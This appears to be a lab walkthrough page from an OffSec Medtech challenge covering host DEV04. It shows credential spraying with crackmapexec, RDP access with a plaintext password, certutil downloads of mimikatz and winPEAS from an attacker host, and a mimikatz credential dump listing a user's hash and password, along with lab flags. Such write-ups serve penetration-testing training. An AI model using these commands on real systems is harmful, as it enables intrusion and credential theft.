172.16.174.12 (DEV04)

Flags Obtained

Local:
    e7cb359243c6d8dacf70bad3270b038d
    
Root:
    e4049eb196773cadaff9eaa1406445c6

Access method

proxychains crackmapexec rdp 172.16.116.12 -d medtech.com -u users.txt -p password.txt --continue-on-success

proxychains xfreerdp /d:medtech.com /u:yoshi /p:Mushroom\! /v:172.16.116.12 +clipboard /cert:ignore /size:70% +drive:KALISHARE,/home/kali/OffSec/ChallengeLabs/Challenge1_Medtech/hostdir/

Enumeration

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"
whoami
whoami /groups
whoami /priv

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log -File -Recurse -ErrorAction SilentlyContinue

Using +drive flag when initiating the xfreerdp connection
    > Transfer winPEASx64.exe file onto the desktop
    > Run winPEASx64.exe on terminal

Privilege Escalation

Admin Enumeration

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"

whoami
whoami /groups
whoami /priv

powershell -ep bypass
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log -File -Recurse -ErrorAction SilentlyContinue

type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\yoshi\Desktop\local.txt

certutil -urlcache -split -f http://192.168.45.239/mimikatz.exe mimikatz.exe

./mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Username

Hash

Password

MEDTECH/leon

2e208ad146efda5bc44869025e06544a

rabbit:)

certutil -urlcache -split -f http://192.168.45.239/winPEASx64.exe winPEASx64.exe
./winPEASx64.exe

Previous172.16.174.11 (FILES02)Next172.16.174.13 (PROD01)

Last updated 1 year ago

hashtagAccess method

hashtagEnumeration

hashtagPrivilege Escalation

hashtagAdmin Enumeration

Access method

Enumeration

Privilege Escalation

Admin Enumeration